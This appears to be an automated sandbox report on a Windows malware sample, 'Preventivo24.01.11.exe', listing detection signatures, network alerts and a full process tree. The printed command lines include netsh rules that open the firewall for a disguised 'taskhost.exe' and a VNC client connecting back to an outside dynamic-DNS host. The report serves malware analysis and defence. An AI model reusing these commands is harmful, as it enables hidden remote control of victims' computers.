Edit tour
Windows
Analysis Report
Preventivo24.01.11.exe
Overview
General Information
Detection
Score: | 84 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Contains VNC / remote desktop functionality (version string found)
Contains functionalty to change the wallpaper
Modifies the windows firewall
Uses cmd line tools excessively to alter registry or file data
Uses netsh to modify the Windows network and firewall settings
Binary contains a suspicious time stamp
Checks for available system drives (often done to infect USB drives)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops certificate files (DER)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Uses taskkill to terminate processes
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
- Preventivo24.01.11.exe (PID: 5272 cmdline:
C:\Users\u ser\Deskto p\Preventi vo24.01.11 .exe MD5: 32F35B78A3DC5949CE3C99F2981DEF6B) - msiexec.exe (PID: 6552 cmdline:
C:\Windows \system32\ msiexec.ex e" /i "C:\ Users\user \AppData\R oaming\Pho to and Fax Vn\Photo and vn 1.1 .2\install \F97891C\m ain1.msi" AI_SETUPEX EPATH=C:\U sers\user\ Desktop\Pr eventivo24 .01.11.exe SETUPEXED IR=C:\User s\user\Des ktop\ EXE_ CMD_LINE=" /exenoupda tes /force cleanup /w intime 170 6007874 " AI_EUIMSI= " MD5: 9D09DC1EDA745A5F87553048E57620CF)
- viewer.exe (PID: 5504 cmdline:
C:\Games\v iewer.exe" /HideWind ow "C:\Gam es\cmmc.cm d MD5: 29ED7D64CE8003C0139CCCB04D9AF7F0) - cmd.exe (PID: 1096 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\Game s\cmmc.cmd " " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 1632 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 4536 cmdline:
C:\Windows \system32\ cmd.exe /c Set GUID[ 2>Nul MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - cmd.exe (PID: 5808 cmdline:
C:\Windows \system32\ cmd.exe /c Reg Query "HKLM\SOF TWARE\Micr osoft\Wind ows NT\Cur rentVersio n\NetworkL ist\Profil es" /S /V Descriptio n MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - reg.exe (PID: 3524 cmdline:
Reg Query "HKLM\SOFT WARE\Micro soft\Windo ws NT\Curr entVersion \NetworkLi st\Profile s" /S /V D escription MD5: CDD462E86EC0F20DE2A1D781928B1B0C) - WMIC.exe (PID: 5736 cmdline:
wmic proce ss where ( name="task host.exe") get comma ndline MD5: E2DE6500DE1148C7F6027AD50AC8B891) - findstr.exe (PID: 4080 cmdline:
findstr /i "taskhost .exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E) - Acrobat.exe (PID: 4428 cmdline:
C:\Program Files\Ado be\Acrobat DC\Acroba t\Acrobat. exe" "C:\U sers\user\ AppData\Lo cal\Temp\~ .pdf MD5: 24EAD1C46A47022347DC0F05F6EFBB8C) - AcroCEF.exe (PID: 3716 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ba ckgroundco lor=167772 15 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) - AcroCEF.exe (PID: 7296 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --log-seve rity=disab le --user- agent-prod uct="Reade rServices/ 23.6.20320 Chrome/10 5.0.0.0" - -lang=en-U S --user-d ata-dir="C :\Users\us er\AppData \Local\CEF \User Data " --log-fi le="C:\Pro gram Files \Adobe\Acr obat DC\Ac robat\acro cef_1\debu g.log" --m ojo-platfo rm-channel -handle=21 04 --field -trial-han dle=1568,i ,603436212 1281620577 ,861615287 7679475302 ,131072 -- disable-fe atures=Bac kForwardCa che,Calcul ateNativeW inOcclusio n,WinUseBr owserSpell Checker /p refetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) - viewer.exe (PID: 4592 cmdline:
C:\Games\v iewer.exe /HideWindo w C:\Games \c.cmd MD5: 29ED7D64CE8003C0139CCCB04D9AF7F0) - cmd.exe (PID: 6552 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\Game s\c.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 6556 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - mode.com (PID: 4080 cmdline:
Mode 90,20 MD5: FB615848338231CEBC16E32A3035C3F8) - cmd.exe (PID: 7672 cmdline:
C:\Windows \system32\ cmd.exe /c Set GUID[ 2>Nul MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - cmd.exe (PID: 7828 cmdline:
C:\Windows \system32\ cmd.exe /c Reg Query "HKLM\SOF TWARE\Micr osoft\Wind ows NT\Cur rentVersio n\NetworkL ist\Profil es" /S /V Descriptio n MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - reg.exe (PID: 7848 cmdline:
Reg Query "HKLM\SOFT WARE\Micro soft\Windo ws NT\Curr entVersion \NetworkLi st\Profile s" /S /V D escription MD5: CDD462E86EC0F20DE2A1D781928B1B0C) - cmd.exe (PID: 7928 cmdline:
C:\Windows \system32\ cmd.exe /S /D /c" ty pe C:\Game s\cmd.txt" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - cmd.exe (PID: 7936 cmdline:
cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - mode.com (PID: 7960 cmdline:
Mode 90,20 MD5: FB615848338231CEBC16E32A3035C3F8) - netsh.exe (PID: 8120 cmdline:
netsh fire wall add a llowedprog ram progra m="C:\Game s\taskhost .exe" name ="MyApplic ation" mod e=ENABLE s cope=ALL MD5: 4E89A1A088BE715D6C946E55AB07C7DF) - netsh.exe (PID: 7724 cmdline:
netsh fire wall add a llowedprog ram progra m="C:\Game s\taskhost .exe" name ="MyApplic atio" mode =ENABLE sc ope=ALL pr ofile=ALL MD5: 4E89A1A088BE715D6C946E55AB07C7DF) - WMIC.exe (PID: 7816 cmdline:
wmic proce ss where ( name="task host.exe") get comma ndline MD5: E2DE6500DE1148C7F6027AD50AC8B891) - findstr.exe (PID: 7716 cmdline:
findstr /i "taskhost .exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E) - taskhost.exe (PID: 3992 cmdline:
C:\Games\t askhost.ex e -autorec onnect ID: 5402254 -c onnect vnv ariant2024 .ddnsfree. com:5500 - run MD5: 663FE548A57BBD487144EC8226A7A549) - viewer.exe (PID: 3840 cmdline:
C:\Games\v iewer.exe /HideWindo w C:\Games \once.cmd MD5: 29ED7D64CE8003C0139CCCB04D9AF7F0) - cmd.exe (PID: 8180 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\Game s\once.cmd " " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 7864 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - viewer.exe (PID: 2584 cmdline:
C:\Games\v iewer.exe /HideWindo w C:\Games \cmmc.cmd MD5: 29ED7D64CE8003C0139CCCB04D9AF7F0) - cmd.exe (PID: 4404 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\Game s\cmmc.cmd " " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 7356 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 3636 cmdline:
C:\Windows \system32\ cmd.exe /c Set GUID[ 2>Nul MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - cmd.exe (PID: 7352 cmdline:
C:\Windows \system32\ cmd.exe /c Reg Query "HKLM\SOF TWARE\Micr osoft\Wind ows NT\Cur rentVersio n\NetworkL ist\Profil es" /S /V Descriptio n MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - reg.exe (PID: 7376 cmdline:
Reg Query "HKLM\SOFT WARE\Micro soft\Windo ws NT\Curr entVersion \NetworkLi st\Profile s" /S /V D escription MD5: CDD462E86EC0F20DE2A1D781928B1B0C) - WMIC.exe (PID: 5492 cmdline:
wmic proce ss where ( name="task host.exe") get comma ndline MD5: E2DE6500DE1148C7F6027AD50AC8B891) - findstr.exe (PID: 7860 cmdline:
findstr /i "taskhost .exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E) - timeout.exe (PID: 5360 cmdline:
timeout /t 20 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3) - timeout.exe (PID: 7840 cmdline:
timeout /t 20 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3) - timeout.exe (PID: 4332 cmdline:
timeout /t 20 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3) - timeout.exe (PID: 1288 cmdline:
timeout /t 1 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3) - taskkill.exe (PID: 7684 cmdline:
taskkill / im rundll3 2.exe /f MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - timeout.exe (PID: 7912 cmdline:
timeout /t 2 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3) - taskkill.exe (PID: 7312 cmdline:
taskkill / im rundll3 2.exe /f MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - timeout.exe (PID: 7756 cmdline:
timeout /t 2 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3) - taskkill.exe (PID: 7344 cmdline:
taskkill / im rundll3 2.exe /f MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - timeout.exe (PID: 7748 cmdline:
timeout /t 2 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
- cleanup
⊘No configs have been found
⊘No yara matches
⊘No Sigma rule has matched
Timestamp: | 192.168.2.593.184.216.3449705802834928 01/23/24-12:07:53.684308 |
SID: | 2834928 |
Source Port: | 49705 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | Virustotal: | Perma Link |
Source: | Virustotal: | Perma Link |
Source: | Static PE information: |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: |
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: |
Source: | Code function: |
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: |
Networking |
---|
Source: | Snort IDS: |
Source: | TCP traffic: |
Source: | IP Address: | ||
Source: | IP Address: |
Source: | HTTP traffic detected: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | DNS traffic detected: |
Source: | HTTP traffic detected: |